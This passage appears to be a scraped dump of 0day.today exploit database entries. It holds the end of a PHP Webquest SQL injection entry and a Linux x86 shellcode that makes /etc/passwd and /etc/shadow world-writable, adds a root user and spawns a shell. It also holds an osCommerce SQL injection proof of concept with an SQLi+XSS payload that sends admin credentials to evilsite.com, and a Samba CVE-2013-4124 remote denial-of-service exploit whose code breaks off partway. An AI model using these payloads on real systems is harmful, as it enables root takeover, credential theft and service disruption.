p\u00e1ginas\r\nif ($_GET['id_actividad']!=''){\r\n $id_actividad=$_GET['id_actividad'];\r\n}else{\r\n $id_actividad='1500000';\r\n}\r\nif ($_GET['id_pagina']!=''){\r\n $id_pagina=$_GET['id_pagina'];\r\n}else{\r\n $id_pagina='1';\r\n $texto_actual=$texto_alternativo;\r\n $imagen_actual='../imagenes/no_imagen.gif';\r\n}\r\n #echo \"PAGINA DEL GET:\".$id_pagina.\"<br>\";\r\n #echo \"PAGINA DEL GET:\".$id_pagina.\"<br>\";\r\n$sentencia= \"SELECT * FROM actividad WHERE id_actividad=\".$id_actividad;\r\n$resultado=mysql_query($sentencia);\r\nwhile($v=mysql_fetch_array($resultado)){\r\n foreach ($v as $indice=>$valor){\r\n if(!is_int($indice)){\r\n # echo $indice.\":\".$valor.\"<br>\";\r\n $campo[$indice]=$valor;\r\n \r\n }\r\n }\r\n}\r\n$sentencia=\"select * from pagina where id_actividad=\".$id_actividad.\" order by num_pagina asc\";\r\n$resultado=mysql_query($sentencia);\r\n$j=1; \r\nwhile($v=mysql_fetch_array($resultado)){\r\n foreach ($v as $indice=>$valor){\r\n if(!is_int($indice)){\r\n #echo $indice.\":\".$valor.\"<br>\";\r\n $campo[$j][$indice]=$valor;\r\n \r\n }\r\n }\r\n $j++;\r\n}\r\nfor ($cont=1; $cont<=5; $cont++){\r\n if ($campo[$cont]['num_pagina']==$id_pagina){\r\n $texto_actual=$campo[$cont]['texto'];\r\n $imagen_actual=$campo[$cont]['imagen'];\r\n } \r\n }\r\n$resta=0;\r\n$tamano_enlaces=$campo['font_size'] - $resta ;\r\n$tamano_titulo=$campo['font_size'];\r\n#echo $tamano_titulo;\r\n?>\r\n \r\n \r\n<html>\r\n<head>\r\n \r\n<title>PHP Webquest</title>\r\n<!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org\r\nPrograma elaborado por Antonio Temprano bajo Licencia GPL\r\nPuede ser utilizado gratuitamente por quien quiera hacerlo con fines\r\neducativos y con la obligaci\u00f3n de no quitar estas l\u00edneas de c\u00f3digo\r\n-->\r\n<style>\r\ntable {\r\n font-family : <? echo $campo['font_face'];?>;\r\n font-size : <? echo $campo['font_size'];?>;\r\n font-weight : normal;\r\n color: <? echo $campo['color_texto_principal'];?>;\r\n}\r\na {\r\n font-family : <? echo $campo['font_face'];?>;\r\n font-size : <? echo $campo['font_size'];?>;\r\n text-decoration: none;\r\n color: <? echo $campo['color_enlaces'];?>;\r\n font-weight : normal;\r\n}\r\n \r\na:hover {\r\n position: relative;\r\n top: 1px;\r\n left: 1px;\r\n font-family : <? echo $campo['font_face'];?>;\r\n font-size : <? echo $campo['font_size'];?>;\r\n text-decoration: none;\r\n color: <? echo $campo['color_enlaces_resaltados'];?>;\r\n font-weight : normal; \r\n}\r\n \r\ndiv.phpwebquest { font-size : 7.5pt;}\r\ndiv.phpwebquest a:link { font-size : 7.5pt;}\r\ndiv.phpwebquest a:hover { font-size : 7.5pt;}\r\ndiv.phpwebquest a { font-size : 7.5pt;};\r\n</style>\r\n</head>\r\n \r\n<body bgcolor=\"<? echo $campo['color_fondo_pagina'];?>\">\r\n<div align=\"center\">\r\n<table width=\"750\" border=\"0\" cellpadding=\"0\" cellspacing=\"1\" bgcolor=\"<? echo $campo['color_cuadro_pagina'];?>\">\r\n <tr>\r\n <td><div align=\"center\">\r\n \r\n \r\n <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"1\" bgcolor=\"<? echo $campo['color_cuadro_texto'];?>\">\r\n <tr>\r\n <td><table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n <tr>\r\n <td height=\"50\"><div valign=\"middle\" align=\"center\"><h1><font color=\"<? echo $campo['color_texto_titulo'];?>\"><? echo $campo['titulo'];?></font></h1></div></td>\r\n </tr>\r\n <tr>\r\n <? if ($id_pagina==1){\r\n $titular=$introduccion;\r\n }elseif($id_pagina==2){\r\n $titular=$tareas;\r\n }elseif($id_pagina==3){\r\n $titular=$proceso; \r\n }elseif($id_pagina==4){\r\n $titular=$evaluacion; \r\n }else{\r\n $titular=$conclusiones; \r\n } \r\n ?>\r\n \r\n <td height=\"50\" bgcolor=\"<? echo $campo['color_cuadro_pagina'];?>\"><font color=\"<? echo $campo['color_texto_tipo'];?>\"><div valign=\"middle\" align=\"center\"><h3><? echo $titular;?></h3></div></font></td>\r\n </tr>\r\n \r\n <tr>\r\n <td><table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n <tr>\r\n <td width=\"81%\" valign=\"top\"><table width=\"100%\" height=\"141\" border=\"0\" cellpadding=\"0\" cellspacing=\"1\">\r\n <tr>\r\n <td width=\"1%\" height=\"139\"> </td>\r\n <td width=\"97%\" valign=\"middle\"><div align=\"left\">\r\n <table width=\"100%\" height=\"134\" border=\"0\" cellpadding=\"0\" cellspacing=\"1\">\r\n <tr>\r\n <td width=\"1%\" valign=\"top\"><div align=\"left\"><img src=\"<? echo $imagen_actual;?>\"></div></td>\r\n <td width=\"2%\"> </td>\r\n \r\n <td width=\"97%\"><? echo $texto_actual;?><br>\r\n <table align=center width=\"80%\" border=0 bgcolor=\"<? echo $campo['color_cuadro_menu'];?>\">\r\n \r\n <? if ($id_pagina==3){\r\n echo '<tr></tr>';\r\n $sentencia=\"select url, descripcion from url where id_actividad=\".$id_actividad;\r\n $resultado=mysql_query($sentencia);\r\n $j=1; \r\n while($v=mysql_fetch_array($resultado)){\r\n foreach ($v as $indice=>$valor){\r\n if(!is_int($indice)){\r\n if($indice=='url'){\r\n echo '<tr><td><div class=\"celdamenu\"><a href='.$valor.' target=\"_blank\"></div>';\r\n }else{ \r\n echo $valor.\"</td></tr>\";\r\n }\r\n $url[$j][$indice]=$valor;\r\n }\r\n }\r\n $j++; \r\n }\r\n }\r\n mysql_close($c);\r\n ?>\r\n </table>\r\n \r\n </td>\r\n </tr>\r\n </table>\r\n </div></td>\r\n <td width=\"2%\"> </td>\r\n </tr>\r\n </table></td>\r\n \r\n <td width=\"15%\" valign=\"top\">\r\n <table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\" bgcolor=\"<? echo $campo['color_cuadro_texto'];?>\" bordercolor=\"#FFFFFF\"><tr><td> </td></tr></table>\r\n <table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\" bgcolor=\"<? echo $campo['color_cuadro_menu'];?>\" bordercolor=\"#FFFFFF\">\r\n \r\n <tr>\r\n <td><div align=\"left\"><a href=\"soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad'].\"&id_pagina=1\"; ?>\"> <? echo $enlace_introduccion; ?></a></div></td>\r\n </tr>\r\n <tr>\r\n <td height=\"1\" bgcolor=\"#FFFFFF\"></td>\r\n </tr>\r\n \r\n <tr>\r\n <td><div align=\"left\"><a href=\"soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad'].\"&id_pagina=2\"; ?>\"> <? echo $enlace_tareas; ?></a></div></td>\r\n </tr>\r\n <tr>\r\n <td height=\"1\" bgcolor=\"#FFFFFF\"></td>\r\n </tr>\r\n <tr>\r\n <td><div align=\"left\"><a href=\"soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad'].\"&id_pagina=3\"; ?>\"> <? echo $enlace_proceso; ?></a></font></div></td>\r\n </tr>\r\n \r\n <tr>\r\n <td height=\"1\" bgcolor=\"#FFFFFF\"></td>\r\n </tr>\r\n <tr>\r\n <td><div align=\"left\"><a href=\"soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad'].\"&id_pagina=4\"; ?>\"> <? echo $enlace_evaluacion; ?></a></font></div></td>\r\n \r\n </tr>\r\n <tr>\r\n <td height=\"1\" bgcolor=\"#FFFFFF\"></td>\r\n </tr>\r\n <tr>\r\n <td><div align=\"left\"><a href=\"soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad'].\"&id_pagina=5\"; ?>\"> <? echo $enlace_conclusiones; ?></a></font></div></td>\r\n </tr>\r\n </table></td>\r\n </tr>\r\n \r\n </table></td>\r\n </tr>\r\n </table></td>\r\n </tr>\r\n <tr>\r\n <td height=\"19\">\r\n <table width=\"100%\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n <tr>\r\n <td width=\"55%\"><div class=\"phpwebquest\" align=\"right\"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>\r\n <td width=\"45%\"><div class=\"phpwebquest\" align=\"left\"><a href=\"http://www.phpwebquest.org\"> PHPWebquest</a></div></td>\r\n </tr>\r\n </table>\r\n </td>\r\n </tr>\r\n </table>\r\n </div></td>\r\n </tr>\r\n </table>\r\n \r\n </div>\r\n</body>\r\n</html>\r\n \r\n#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/23194"}, {"lastseen": "2016-04-19T23:28:57", "references": [], "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "reporter": "Ali Razmjoo", "published": "2014-08-11T00:00:00", "type": "zdt", "title": "linux/x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user) 378 Bytes", "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-08-11T00:00:00", "href": "http://0day.today/exploit/description/22504", "id": "1337DAY-ID-22504", "sourceData": "# Shellcode Linux x86 [378Bytes] chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh \r\n# Date: 4/8/2014\r\n# Exploit Author: Ali Razmjoo\r\n# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]\r\n/*\r\nAli Razmjoo , Ali.Razmjoo1994@Gmail.Com\r\nShellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh \r\nlength: 378 bytes\r\nchmod('/etc/passwd',777)\r\nchmod('/etc/shadow',777)\r\nopen passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd\r\nsetreuid() , execve('/bin/sh')\r\n\r\n\r\n00000000 <_start>:\r\n 0:\t31 c0 \txor %eax,%eax\r\n 2:\t31 db \txor %ebx,%ebx\r\n 4:\t6a 0f \tpush $0xf\r\n 6:\t58 \tpop %eax\r\n 7:\t68 6a 73 77 64 \tpush $0x6477736a\r\n c:\t5b \tpop %ebx\r\n d:\tc1 eb 08 \tshr $0x8,%ebx\r\n 10:\t53 \tpush %ebx\r\n 11:\t68 2f 70 61 73 \tpush $0x7361702f\r\n 16:\t68 2f 65 74 63 \tpush $0x6374652f\r\n 1b:\t89 e3 \tmov %esp,%ebx\r\n 1d:\t68 41 41 ff 01 \tpush $0x1ff4141\r\n 22:\t59 \tpop %ecx\r\n 23:\tc1 e9 08 \tshr $0x8,%ecx\r\n 26:\tc1 e9 08 \tshr $0x8,%ecx\r\n 29:\tcd 80 \tint $0x80\r\n 2b:\t6a 0f \tpush $0xf\r\n 2d:\t58 \tpop %eax\r\n 2e:\t68 6a 64 6f 77 \tpush $0x776f646a\r\n 33:\t5b \tpop %ebx\r\n 34:\tc1 eb 08 \tshr $0x8,%ebx\r\n 37:\t53 \tpush %ebx\r\n 38:\t68 2f 73 68 61 \tpush $0x6168732f\r\n 3d:\t68 2f 65 74 63 \tpush $0x6374652f\r\n 42:\t89 e3 \tmov %esp,%ebx\r\n 44:\t68 41 41 ff 01 \tpush $0x1ff4141\r\n 49:\t59 \tpop %ecx\r\n 4a:\tc1 e9 08 \tshr $0x8,%ecx\r\n 4d:\tc1 e9 08 \tshr $0x8,%ecx\r\n 50:\tcd 80 \tint $0x80\r\n 52:\t6a 05 \tpush $0x5\r\n 54:\t58 \tpop %eax\r\n 55:\t68 41 73 77 64 \tpush $0x64777341\r\n 5a:\t5b \tpop %ebx\r\n 5b:\tc1 eb 08 \tshr $0x8,%ebx\r\n 5e:\t53 \tpush %ebx\r\n 5f:\t68 2f 70 61 73 \tpush $0x7361702f\r\n 64:\t68 2f 65 74 63 \tpush $0x6374652f\r\n 69:\t89 e3 \tmov %esp,%ebx\r\n 6b:\t68 41 41 01 04 \tpush $0x4014141\r\n 70:\t59 \tpop %ecx\r\n 71:\tc1 e9 08 \tshr $0x8,%ecx\r\n 74:\tc1 e9 08 \tshr $0x8,%ecx\r\n 77:\tcd 80 \tint $0x80\r\n 79:\t89 c3 \tmov %eax,%ebx\r\n 7b:\t6a 04 \tpush $0x4\r\n 7d:\t58 \tpop %eax\r\n 7e:\t68 41 73 68 0a \tpush $0xa687341\r\n 83:\t59 \tpop %ecx\r\n 84:\tc1 e9 08 \tshr $0x8,%ecx\r\n 87:\t51 \tpush %ecx\r\n 88:\t68 6e 2f 62 61 \tpush $0x61622f6e\r\n 8d:\t68 3a 2f 62 69 \tpush $0x69622f3a\r\n 92:\t68 72 6f 6f 74 \tpush $0x746f6f72\r\n 97:\t68 4c 49 3a 2f \tpush $0x2f3a494c\r\n 9c:\t68 3a 30 3a 41 \tpush $0x413a303a\r\n a1:\t68 4b 2e 3a 30 \tpush $0x303a2e4b\r\n a6:\t68 66 77 55 57 \tpush $0x57557766\r\n ab:\t68 68 70 31 50 \tpush $0x50317068\r\n b0:\t68 7a 59 65 41 \tpush $0x4165597a\r\n b5:\t68 41 61 41 51 \tpush $0x51416141\r\n ba:\t68 49 38 75 74 \tpush $0x74753849\r\n bf:\t68 50 4d 59 68 \tpush $0x68594d50\r\n c4:\t68 54 42 74 7a \tpush $0x7a744254\r\n c9:\t68 51 2f 38 54 \tpush $0x54382f51\r\n ce:\t68 45 36 6d 67 \tpush $0x676d3645\r\n d3:\t68 76 50 2e 73 \tpush $0x732e5076\r\n d8:\t68 4e 58 52 37 \tpush $0x3752584e\r\n dd:\t68 39 4b 55 48 \tpush $0x48554b39\r\n e2:\t68 72 2f 59 42 \tpush $0x42592f72\r\n e7:\t68 56 78 4b 47 \tpush $0x474b7856\r\n ec:\t68 39 55 66 5a \tpush $0x5a665539\r\n f1:\t68 46 56 6a 68 \tpush $0x686a5646\r\n f6:\t68 46 63 38 79 \tpush $0x79386346\r\n fb:\t68 70 59 6a 71 \tpush $0x716a5970\r\n 100:\t68 77 69 53 68 \tpush $0x68536977\r\n 105:\t68 6e 54 67 54 \tpush $0x5467546e\r\n 10a:\t68 58 4d 69 37 \tpush $0x37694d58\r\n 10f:\t68 2f 41 6e 24 \tpush $0x246e412f\r\n 114:\t68 70 55 6e 4d \tpush $0x4d6e5570\r\n 119:\t68 24 36 24 6a \tpush $0x6a243624\r\n 11e:\t68 41 4c 49 3a \tpush $0x3a494c41\r\n 123:\t89 e1 \tmov %esp,%ecx\r\n 125:\tba 41 41 41 7f \tmov $0x7f414141,%edx\r\n 12a:\tc1 ea 08 \tshr $0x8,%edx\r\n 12d:\tc1 ea 08 \tshr $0x8,%edx\r\n 130:\tc1 ea 08 \tshr $0x8,%edx\r\n 133:\tcd 80 \tint $0x80\r\n 135:\t31 c0 \txor %eax,%eax\r\n 137:\tb0 46 \tmov $0x46,%al\r\n 139:\t31 db \txor %ebx,%ebx\r\n 13b:\t31 c9 \txor %ecx,%ecx\r\n 13d:\tcd 80 \tint $0x80\r\n 13f:\t31 c0 \txor %eax,%eax\r\n 141:\tb0 46 \tmov $0x46,%al\r\n 143:\t31 db \txor %ebx,%ebx\r\n 145:\t31 c9 \txor %ecx,%ecx\r\n 147:\tcd 80 \tint $0x80\r\n 149:\t68 59 59 59 59 \tpush $0x59595959\r\n 14e:\t68 58 58 58 58 \tpush $0x58585858\r\n 153:\t68 2f 73 68 42 \tpush $0x4268732f\r\n 158:\t68 2f 62 69 6e \tpush $0x6e69622f\r\n 15d:\t89 e3 \tmov %esp,%ebx\r\n 15f:\t31 c0 \txor %eax,%eax\r\n 161:\t88 43 07 \tmov %al,0x7(%ebx)\r\n 164:\t89 5b 08 \tmov %ebx,0x8(%ebx)\r\n 167:\t89 43 0c \tmov %eax,0xc(%ebx)\r\n 16a:\tb0 0b \tmov $0xb,%al\r\n 16c:\t8d 4b 08 \tlea 0x8(%ebx),%ecx\r\n 16f:\t8d 53 0c \tlea 0xc(%ebx),%edx\r\n 172:\tcd 80 \tint $0x80\r\n 174:\tb0 01 \tmov $0x1,%al\r\n 176:\tb3 01 \tmov $0x1,%bl\r\n 178:\tcd 80 \tint $0x80\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\nchar sc[] = \"\\x31\\xc0\\x31\\xdb\\x6a\\x0f\\x58\\x68\\x6a\\x73\\x77\\x64\\x5b\\xc1\\xeb\\x08\\x53\\x68\\x2f\\x70\\x61\\x73\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x68\\x41\\x41\\xff\\x01\\x59\\xc1\\xe9\\x08\\xc1\\xe9\\x08\\xcd\\x80\\x6a\\x0f\\x58\\x68\\x6a\\x64\\x6f\\x77\\x5b\\xc1\\xeb\\x08\\x53\\x68\\x2f\\x73\\x68\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x68\\x41\\x41\\xff\\x01\\x59\\xc1\\xe9\\x08\\xc1\\xe9\\x08\\xcd\\x80\\x6a\\x05\\x58\\x68\\x41\\x73\\x77\\x64\\x5b\\xc1\\xeb\\x08\\x53\\x68\\x2f\\x70\\x61\\x73\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x68\\x41\\x41\\x01\\x04\\x59\\xc1\\xe9\\x08\\xc1\\xe9\\x08\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x68\\x41\\x73\\x68\\x0a\\x59\\xc1\\xe9\\x08\\x51\\x68\\x6e\\x2f\\x62\\x61\\x68\\x3a\\x2f\\x62\\x69\\x68\\x72\\x6f\\x6f\\x74\\x68\\x4c\\x49\\x3a\\x2f\\x68\\x3a\\x30\\x3a\\x41\\x68\\x4b\\x2e\\x3a\\x30\\x68\\x66\\x77\\x55\\x57\\x68\\x68\\x70\\x31\\x50\\x68\\x7a\\x59\\x65\\x41\\x68\\x41\\x61\\x41\\x51\\x68\\x49\\x38\\x75\\x74\\x68\\x50\\x4d\\x59\\x68\\x68\\x54\\x42\\x74\\x7a\\x68\\x51\\x2f\\x38\\x54\\x68\\x45\\x36\\x6d\\x67\\x68\\x76\\x50\\x2e\\x73\\x68\\x4e\\x58\\x52\\x37\\x68\\x39\\x4b\\x55\\x48\\x68\\x72\\x2f\\x59\\x42\\x68\\x56\\x78\\x4b\\x47\\x68\\x39\\x55\\x66\\x5a\\x68\\x46\\x56\\x6a\\x68\\x68\\x46\\x63\\x38\\x79\\x68\\x70\\x59\\x6a\\x71\\x68\\x77\\x69\\x53\\x68\\x68\\x6e\\x54\\x67\\x54\\x68\\x58\\x4d\\x69\\x37\\x68\\x2f\\x41\\x6e\\x24\\x68\\x70\\x55\\x6e\\x4d\\x68\\x24\\x36\\x24\\x6a\\x68\\x41\\x4c\\x49\\x3a\\x89\\xe1\\xba\\x41\\x41\\x41\\x7f\\xc1\\xea\\x08\\xc1\\xea\\x08\\xc1\\xea\\x08\\xcd\\x80\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\x68\\x59\\x59\\x59\\x59\\x68\\x58\\x58\\x58\\x58\\x68\\x2f\\x73\\x68\\x42\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\\x53\\x0c\\xcd\\x80\\xb0\\x01\\xb3\\x01\\xcd\\x80\";\r\nint main(void)\r\n{\r\n\r\n fprintf(stdout,\"Length: %d\\n\\n\",strlen(sc));\r\n\r\n (*(void(*)()) sc)();\r\n\r\n}\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/22504"}, {"lastseen": "2016-04-19T04:05:23", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Ahmed Aboul-Ela", "published": "2014-02-19T00:00:00", "type": "zdt", "title": "osCommerce v2.x SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-02-19T00:00:00", "href": "http://0day.today/exploit/description/21920", "id": "1337DAY-ID-21920", "sourceData": "# Title: osCommerce v2.x SQL Injection Vulnerability\r\n# Dork: Powered by osCommerce\r\n# Author: Ahmed Aboul-Ela\r\n# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek\r\n# Vendor : http://www.oscommerce.com\r\n# Version: v2.3.3.4 (current latest release) and prior versions should be affected too\r\n\r\n- Vulnerable Code snippet in \"catalog/admin/geo_zones.php\":\r\n\r\n<?php\r\n[...]\r\nLINE 138: $rows = 0;\r\nLINE 139: $zones_query_raw = \"select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified,\r\na.date_added, z.zone_name from \" . TABLE_ZONES_TO_GEO_ZONES . \" a left join \" . TABLE_COUNTRIES . \" c on a.zone_country_id = c.countries_id\r\nleft join \" . TABLE_ZONES . \" z on a.zone_id = z.zone_id where a.geo_zone_id = \" . $HTTP_GET_VARS['zID'] . \" order by association_id\";\r\nLINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows);\r\nLINE 141: $zones_query = tep_db_query($zones_query_raw);\r\n[...]\r\n?> \r\n\r\n As we can see at line 139 the GET zID parameter directly concatenated with the sql query\r\n without any type of sanitization which leads directly to sql injection vulnerability\r\n\r\n\r\n- Proof of Concept ( dump the admin username and password ):\r\n\r\n http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --\r\n\r\n\r\n- Exploitation & Attack Scenario:\r\n\r\n an authenticated admin account is required to successfully exploit the vulnerability\r\n but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack \r\n\r\n Example to steal the administrator username & password and send it to php logger at \"http://evilsite.com/logger.php?log=[ADMIN USER:HASH]\"\r\n\r\n We can use hybrid attack technique ( SQL Injection + XSS ) :\r\n\r\n http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators --\r\n\r\n\r\n- Mitigation:\r\n \r\n The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/21920"}, {"lastseen": "2016-04-20T01:00:48", "references": [], "description": "vulnerable samba daemon has a integer overflow \rto cause remote dos by nttrans reply while the \rdaemon reading ea_list. In the detail, unsigned\rdata type offset variable in vulnerable function \rof read_nttrans_ea_list can be wrap up! security\rbug!", "edition": 1, "reporter": "x90c", "published": "2013-08-22T00:00:00", "type": "zdt", "title": "Samba nttrans Reply - Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4124"], "modified": "2013-08-22T00:00:00", "href": "http://0day.today/exploit/description/21146", "id": "1337DAY-ID-21146", "sourceData": "[security bug analyze]\r\nsmbd/nttrans.c\r\n---- snip ---- snip ---- snip ---- snip ----\r\n971 /****************************************************************************\r\n 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them.\r\n 973 ****************************************************************************/\r\n 974 EA names, data from samba incoming buffer!\r\n 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size) // *pdata is inject vector\r\n 976 {\r\n 977 struct ea_list *ea_list_head = NULL;\r\n 978 size_t offset = 0; // unisigned\r\n 979 \r\n 980 if (data_size < 4) {\r\n 981 return NULL;\r\n 982 }\r\n 983 \r\n 984 while (offset + 4 <= data_size) { // XXX (3) if offset is wrap up then it enters the loop continuly\r\n 985 size_t next_offset = IVAL(pdata,offset); // unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap!\r\n// XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! \r\n 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL);\r\n 987 \r\n 988 if (!eal) {\r\n 989 return NULL;\r\n 990 }\r\n 991 \r\n 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);\r\n 993 if (next_offset == 0) {\r\n 994 break;\r\n 995 }\r\n 996 \r\n 997 /* Integer wrap protection for the increment. */ // XXX patch code\r\n 998 if (offset + next_offset < offset) {\r\n 999 break;\r\n1000 }\r\n1001 \r\n1002 offset += next_offset; // XXX (2) if next_offset is large value then offset is wrap!\r\n1003 \r\n1004 /* Integer wrap protection for while loop. */ // XXX patch code\r\n1005 if (offset + 4 < offset) {\r\n1006 break;\r\n1007 }\r\n1008 \r\n1009 }\r\n1010 \r\n1011 return ea_list_head;\r\n1012 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n1014 /****************************************************************************\r\n1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).\r\n1016 ****************************************************************************/\r\n1017 \r\n1018 static void call_nt_transact_create(connection_struct *conn,\r\n1019 struct smb_request *req,\r\n1020 uint16 **ppsetup, uint32 setup_count,\r\n1021 char **ppparams, uint32 parameter_count,\r\n1022 char **ppdata, uint32 data_count,\r\n1023 uint32 max_data_count)\r\n1024 {\r\n...\r\n1148 /* We have already checked that ea_len <= data_count here. */\r\n1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,\r\n1150 ea_len);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2639 static void handle_nttrans(connection_struct *conn,\r\n2640 struct trans_state *state,\r\n2641 struct smb_request *req)\r\n2642 {\r\n...\r\n2651 /* Now we must call the relevant NT_TRANS function */\r\n2652 switch(state->call) {\r\n2653 case NT_TRANSACT_CREATE: // NT_TRANSACT_CREATE!\r\n2654 {\r\n2655 START_PROFILE(NT_transact_create);\r\n2656 call_nt_transact_create(\r\n2657 conn, req,\r\n2658 &state->setup, state->setup_count,\r\n2659 &state->param, state->total_param,\r\n2660 &state->data, state->total_data,\r\n2661 state->max_data_return);\r\n2662 END_PROFILE(NT_transact_create);\r\n2663 break;\r\n2664 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n2770 /****************************************************************************\r\n2771 Reply to a SMBNTtrans.\r\n2772 ****************************************************************************/\r\n2773 \r\n2774 void reply_nttrans(struct smb_request *req) // smb_request!\r\n2775 {\r\n...\r\n2945 if ((state->received_data == state->total_data) &&\r\n2946 (state->received_param == state->total_param)) {\r\n2947 handle_nttrans(conn, state, req);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n[exploitability]\r\n \r\n * keywords:\r\n - samba incoming data\r\n - EA names\r\n - data\r\n - 0xf1000000\r\n - SMB NTTRANS\r\n - Samba reply_nttrans() Remote Root Exploit\r\n (http://www.securiteam.com/exploits/5TP0M2AAKS.html)\r\n - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)\r\n - SMBtrans\r\n - http://ubiqx.org/cifs/SMB.html\r\n \r\n \r\nThe security bug is remote dos to a daemon, the \r\nimpact is exist even though it's exploited on \r\nlocal network. If large local network exist and \r\nmany samba on the network, security risk is exist. \r\nI assign the dos impact to medium, and the apache \r\nor wuftpd dos to high because they are can be \r\nexploited on internet\r\n \r\n/*\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n CVE-2013-4124 samba remote dos private exploit\r\n \r\n \r\n ./samba_nttrans_exploit [target ip addr]\r\n \r\n * ... test ...:\r\n I didn't test for the exploit, I \r\n copied another samba nttrans exploit \r\n in 2003 that http://www.securiteam.co\r\n m/exploits/5TP0M2AAKS.html. It should \r\n be works!\r\n \r\n the exploit send malformed nttrans \r\n smb packet with large value of data \r\n offset to cause integer wrap in the \r\n vulnerable function of read_nttrns_ea_list\r\n \r\n I left an article that analyzed it\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n \r\n \r\n x90c\r\n \r\n*/\r\n \r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n \r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n \r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n \r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n \r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n \r\nstruct 